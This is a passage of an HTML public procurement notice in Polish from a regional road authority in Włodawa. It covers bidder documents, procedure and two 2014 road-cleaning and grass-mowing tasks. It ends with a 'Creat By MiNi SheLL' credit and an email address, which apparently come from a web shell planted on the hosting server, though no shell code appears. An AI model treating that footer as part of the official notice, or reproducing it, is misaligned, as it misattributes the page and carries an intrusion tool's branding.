<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oprócz oświadczeń lub dokumentów, które należy dostarczyć w celu
    spełniania warunków udziału, Wykonawca obowiązany jest dołączyć do oferty:
   1) Dowód wniesienia wadium.
   2) Ofertę przetargową - z ceną netto i z podatkiem VAT  wraz
       z Formularzem Cenowym .
   3) Wykaz części zamówienia, których wykonanie Wykonawca zamierza zlecić
       podwykonawcy .
   4) W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia,
       do oferty należy załączyć dokument (np. odpowiednią umowę) ustanawiający
       pełnomocnika do reprezentowania ich w postępowaniu o udzielenie
       zamówienia albo reprezentowania w postępowaniu i zawarcia umowy
       w sprawie zamówienia publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo
       zamówień publicznych.
   5) W przypadku podpisania oferty i innych dokumentów przez osobę/osoby, które
       nie są wymienione w odpisie z właściwego rejestru albo zaświadczeniu o wpisie
       do ewidencji działalności gospodarczej, do oferty należy załączyć dokument
       potwierdzający prawo do reprezentowania podmiotu przez osobę/osoby
       podpisujące ofertę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje
możliwość dokonania zmian postanowień zawartej Umowy w stosunku do treści
oferty, polegających na:
1) zmianie wynagrodzenia Umowy w przypadku, gdy zmianie uległy stawki podatku
VAT - wynagrodzenie ulegnie zmianie w ten sposób, że wynagrodzenie netto
pozostanie takie samo, a wartość podatku VAT i wynagrodzenie brutto ulegną
zmianie
2) zmianach podwykonawcy - podmiotu, na którego zasoby Wykonawca powoływał
się w złożonej ofercie, na zasadach określonych w art. 26 ust. 2b, w celu wykazania
spełniania warunków udziału w postępowaniu - w przypadku akceptacji przez
Zamawiającego wskazanego innego podwykonawcy po wykazaniu, iż proponowany
inny podwykonawca spełnia je w stopniu nie mniejszym niż wymagany w trakcie
postępowania o udzielenie zamówienia.
3) rezygnacji z podwykonawcy - podmiotu, na którego zasoby Wykonawca powoływał
się w złożonej ofercie, na zasadach określonych w art. 26 ust. 2b, w celu wykazania
spełniania warunków udziału w postępowaniu - w przypadku wykazania
Zamawiającemu, iż Wykonawca samodzielnie spełnia je w stopniu nie mniejszym
niż wymagany w trakcie postępowania o udzielenie zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdw.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie, 22-200 Włodawa, ul. Lubelska 60  w pokoju nr 11 w godz. 07:00 - 15:00..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.04.2014 godzina 09:00, miejsce: Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie, 22-200 Włodawa, ul. Lubelska 60, pokój nr 5 (sekretariat) 
Otwarcie ofert:  10.04.2014 r.  godz. 09:10, pokój Nr 6..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i
Wykonawcy przekazują za pomocą faksu nr (82) 572 17 93 lub drogą elektroniczną na adres e-mail: rdw.wlodawa@zdw.lublin.pl
Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski,
zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron na
żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
Osoby uprawnione do porozumiewania się z wykonawcami:
1. W sprawach technicznych
    Zadanie Nr 1  - P. Stanisław Głogowski tel. 601 676 826 
    Zadanie Nr 2  - P. Eugeniusz Andrejuk tel. 601 676 709
2. W sprawach formalno-prawnych związanych z postępowaniem o udzielenie
Zamówienia i zawarciem umowy - P. Barbara Winiarczyk, P. Eugeniusz Kiewczykowski, tel. (82) 572-16-35 pokój Nr 11
UWAGA:
Wykonawcy, którzy uzyskają niniejszą specyfikację ze strony internetowej
zamawiającego lub w inny sposób i zamierzają ubiegać się o udzielenie zamówienia,
proszeni są o przesłanie krótkiej informacji faksem (82) 572-17-93 lub pocztą
elektroniczną na adres e-mail: rdw.wlodawa@zdw.lublin.pl, zawierającej podstawowe dane firmy (nazwa, adres, numer tel. i faksu, adres poczty elektronicznej). Wykonawcy, którzy zgłoszą w ten sposób zamiar ubiegania się o udzielenie zamówienia będą przez
Zamawiającego indywidualnie (bezpośrednio) zawiadamiani o np.: zapytaniach,
wyjaśnieniach i zmianach dotyczących SIWZ, przedłużeniu terminu składania ofert..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> A. Zadanie Nr 1

1) Oczyszczanie (zamiatanie) nawierzchni drogi wojewódzkiej Nr 812 Biała Podlaska - Wisznice - Włodawa - Chełm - Krasnystaw rondo im. Kuraszkiewicza we Włodawie, oczyszczanie (zamiatanie) chodników i ścieżki rowerowej.
2) Sprzątanie pasa drogowego.
3) Koszenie trawników.
4) Opróżnianie koszy ze śmieci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z opisem zawartym w SIWZ.
Szacunkowa wartość zadania netto - 82488,33 PLN.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6, 77.31.41.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> B. Zadanie Nr 2

1) Oczyszczanie (zamiatanie) nawierzchni drogi wojewódzkiej Nr 816 Terespol -
    Sławatycze - Włodawa - Dorohusk - Zosin odcinek Suszno - Orchówek, 
    oczyszczanie (zamiatanie) chodników i ścieżki rowerowej.
2) Sprzątanie pasa drogowego.
3) Koszenie trawników.
4) Opróżnianie koszy ze śmieci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z opisem zawartym w SIWZ.
Szacunkowa wartość zadania netto: 49904,89 PLN.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6, 77.31.41.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com